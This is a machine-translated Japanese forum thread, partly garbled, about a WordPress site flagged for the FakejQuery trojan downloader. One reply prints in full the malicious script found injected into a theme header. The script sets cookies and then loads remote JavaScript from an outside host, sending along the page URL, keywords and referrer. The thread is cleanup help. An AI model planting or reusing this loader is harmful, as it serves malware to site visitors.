0
で見つかりました。表示URL脅威は、私がウェブサイトにこの戦国を訪問しようとしている一部のコンピュータで取得するために始めたドメインに私のウェブサイトを接続して以来、私のワードプレスのウェブサイト
脅威:JS/TrojanDownloader.FakejQuery.Bトロイの木馬
私は何をすべき?
A
答えて
0
ドメインのホストを経由している場合は、そのドメインの説明に連絡します。あなたが自分でそれをホストしているのであれば、接続しているクライアントに影響を与える可能性のある他のアクティブなポートを調べるために、Shodan拡張機能をサイト上で実行します。あなたのJavaScriptファイルのすべてを怪しいものにしてください。
これは正直なところ私の経験では偽造品に見えます。これは実際のトロイの木馬の代わりに、トランスクリプトが使用するもののように見えます。あなたのウェブサイトに任意のjavascriptを持っていないなら、私はほとんどそれが本当ではないことを保証するでしょう。
0
このウイルスに攻撃されたクライアントを持っているので、私はちょうどこの投稿に出会ったばかりです。このサイトは私が追加したいと思うものではなく、Wordpress 3.6(かなり古いもの)を実行していた。
私は、テーマファイルを経て、これはヘッダに追加された:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
私はトロイの木馬の警告が離れていったテーマのヘッダからこれを除去することによって、発見しました。
ワース除去。
関連する問題
- 1. は、どのように私はこのウェブサイトからすべてのURLを取得しようとしたウェブサイト
- 2. 私のウェブサイトで私のウェブサイトは私のコンピュータと少し違って見える
- 3. 私の1and1ドメインをOpenShiftのウェブサイトに接続するには?
- 4. バックエンドを使用して私のウェブサイトにウェブサイトを埋め込む
- 5. は、私は私のゲーム一族のためのブートストラップ付きの小さなウェブサイトを作成した私のウェブサイト
- 6. 私は他のウェブサイトにどのように接続して情報を得ることができますか?
- 7. 私のウェブサイトへの訪問者の国を特定する
- 8. ウェブサイトは、私が速くロードするためにこのウェブサイトを最適化しています3秒
- 9. 私はこのウェブサイトからアイテムの価格を取得したいウェブサイト
- 10. 私はこのウェブサイトからの応答を取得するために離れてotのフィギュアをしようとしている外部のサイトから
- 11. 私は完全なウェブサイトとしてワードプレスをしたい
- 12. 私のウェブサイトのためにGoogleマップを埋め込む問題
- 13. 私は私のウェブサイトを作るためのブートストラップを使用してい
- 14. はどのようにのように、私は私のウェブサイト上でFlashビデオを持っている私のコンピュータ
- 15. は、どのように私は私のウェブサイトのためのボックスをコメントすることができます
- 16. 私が始めるためにしようとしている
- 17. Laravel 5で私のウェブサイトの訪問者をカウントするには?
- 18. は、私は私のワードプレスのウェブサイトのためのユーザー(AJAXログイン)を検証するために、この機能を使用しています
- 19. セクションでは、私は私のAndroidのゲームのための新しいウェブサイトを作ってるんだ、と私はいくつかのインスピレーションを探してネットサーフィンをして、そして私は、このウェブサイトで来たWebページ
- 20. は、エラーを取得する - 私は、グラフAPI呼び出しのために以下のエラーを取得しています私のウェブサイト
- 21. は、私は、ウェブサイトのリンクを取得しようとしていますJavaScriptの
- 22. ダイナミック私はダイナミックサービングを好む応答ウェブサイトのためのウェブサイト
- 23. ウェブサイトの訪問者の国名を取得する方法
- 24. 私のウェブサイトにリンクしている
- 25. は、私は、IFRAMEは外部のウェブサイトを読み込むことができるように私のウェブサイト上でX-フレームヘッダを無視したいのjavascript
- 26. Lighttpd私はどのようにして私のウェブサイトに直接アクセスできないようにしますか?
- 27. 私のウェブサイトにローカリゼーションを追加したい - 多言語ウェブサイト
- 28. データベースへの接続が突然、私のウェブサイトの例外をスローし始めました
- 29. 私は、ログインフォームを持つPHPのウェブサイトを持っていると私はすべての訪問者が自分のGmailアカウントを使用して、私のウェブサイトにできるログインすることができますしたい
- 30. 私のウェブサイトにアクセスし結果を得るために他のドメインをブロックする方法?
[こちら](https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery)と[ここ](https:// blog .sucuri.net/2015/11/jquery-min-php-malware-affected-thousands-of-websites.html)。多分それは助けます。 –
あなたはどのホストを使用していますか? – Kevin
私はホストに連絡してそれを読んだり、答えとともに更新したりします – ssabin